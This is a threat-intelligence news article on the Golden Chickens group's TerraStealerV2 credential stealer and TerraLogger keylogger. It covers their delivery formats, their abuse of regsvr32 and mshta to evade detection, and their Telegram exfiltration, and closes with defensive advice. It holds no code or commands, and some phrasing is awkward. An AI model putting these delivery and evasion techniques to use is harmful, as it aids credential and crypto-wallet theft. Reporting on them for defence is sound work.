Malware-Infected Golden Chickens Reemerge in 2025's Cybercrime Surge, Equipped with Two Fresh Tools
Funky Hackers Group Golden Chickens On The Move Again!
The cybercriminal gang known as Golden Chickens, aka Venom Spider, is once again creating a stir, this time with a brand-new set of tools designed for large-scale credential theft, keystroke logging, and system compromise. Their latest offerings, dubbed TerraStealerV2 malware and TerraLogger, showcase the group's commitment to expanding and upgrading their Malware-as-a-Service (MaaS) solutions.
Over the years, Golden Chickens have been linked to numerous major credential theft and intrusion operations, most notably through their More_eggs malware. However, these new variants demonstrate a deliberate shift towards more aggressively infiltrating browsers, crypto wallets, and user keystrokes than ever before. The malware pair, TerraStealerV2 and TerraLogger, are spreading through various file formats like EXE, MSI, and LNK, making it tricky to spot and simple to distribute.
Decoding TerraStealerV2 and Its Operation
TerraStealerV2 malware is developed to siphon sensitive user data from browsers and cryptocurrency wallets. It scours for browser credentials, goes for saved logins, and strives to extract info from browser extensions. If those extensions are used for asset management or trading, this could potentially lead to crypto wallet theft. Generally delivered via OCX payloads swiped from dubious sites like wetransfers[.]io, it leverage's legitimate Windows utilities like regsvr32.exe and mshta.exe to execute its payload while dodging security systems.
Although it does attempt to pilfer Chrome login data, it's unable to bypass the more recent Application Bound Encryption (ABE) protocols, launched in Chrome post-July 2024. This implies that the tool might be still under active development or simply outdated. The data hoovered up by TerraStealerV2 is then pushed to Telegram channels and external servers, providing the attackers with real-time access to user credentials and activity.
TerraLogger: A Nasty Keylogging Threat Up Close
Unlike its data-harvesting counterpart, TerraLogger takes a more straightforward approach. It acts as a standalone keylogger, stealthily capturing every single keystroke typed on the contaminated machine, from passwords to personal chats. At present, TerraLogger doesn't transfer data or connect with any command-and-control (C2) servers, but its design suggests future integration with other tools within Golden Chickens' ecosystem to form a more powerful infection chain.
How Are These Malware Variants Getting Spread?
Golden Chickens are using a range of file types to distribute their malware, thus increasing the chances of an infection. Common delivery formats include:
- Executables (EXEs)
- Microsoft Installer files (MSI)
- Windows Shortcut files (LNK)
- OLE Control Extensions (OCX)
The multi-format strategy makes it more probable that users will unknowingly install the malware. Once activated, the payloads swing into action, mining for data or logging inputs while sailing past basic antivirus checks. What's worse, the use of known Windows utilities and Telegram for data transfer grants both disguise and control, as messages can be swiftly altered or deleted on the attacker's end.
The Impact on Browser Security and Crypto Users
The arrival of TerraStealerV2 malware signals a renewed focus on browser-based attacks as many users store passwords in browsers like Chrome or deliver crypto holdings through browser extensions. A single infection could unlock access to financial platforms, crypto wallets, or even organizational intranets. Meanwhile, the rise in crypto wallet theft via malware like TerraStealerV2 reflects a broader trend in cybercrime. Stealers are becoming more adaptable, more tweakable, and harder to detect. Despite apparent development limitations, both TerraStealerV2 and TerraLogger are already a sizable concern for browser security, especially when combined.
Ongoing Threat and Future Risks
The introduction of new malware tools by Golden Chickens demonstrates how many players are developing new strategies. Although TerraLogger is limited to just keylogging, it can perform some functions of a keylogger when paired with other tools in Golden Chickens' toolkit as part of a more substantial multi-stage threat. With increasing reports of browser vulnerabilities and stolen crypto wallets, it is crucial to keep tabs on everything that gets downloaded, restrict the amount of unsecured software utilized, and ensure browsers are updated with the latest security features. The history of TerraStealerV2 and TerraLogger is merely the starting point, and it will continue to evolve like our responses must evolve.
- The TerraStealerV2 malware, part of the Golden Chickens' arsenal, is designed to extract sensitive data from browsers and cryptocurrency wallets, potentially leading to wallet theft, especially if the extensions are used for asset management or trading.
- The emergence of TerraStealerV2 and its keylogging counterpart, TerraLogger, underscores the growing adaptability and complexity of stealer malware, as they bypass basic antivirus checks and use known Windows utilities and Telegram for data transfer.
- As many users store passwords in browsers like Chrome and manage crypto holdings through browser extensions, a single infection from these malware variants could grant unauthorized access to financial platforms, organizational intranets, or crypto wallets, posing a significant risk to data-and-cloud-computing and cybersecurity.
- In the face of these evolving threats, it's crucial for users to stay vigilant, regularly update their browsers with the latest security features, restrict the use of unsecured software, and closely monitor downloaded content to maintain technological security in today's digital landscape.
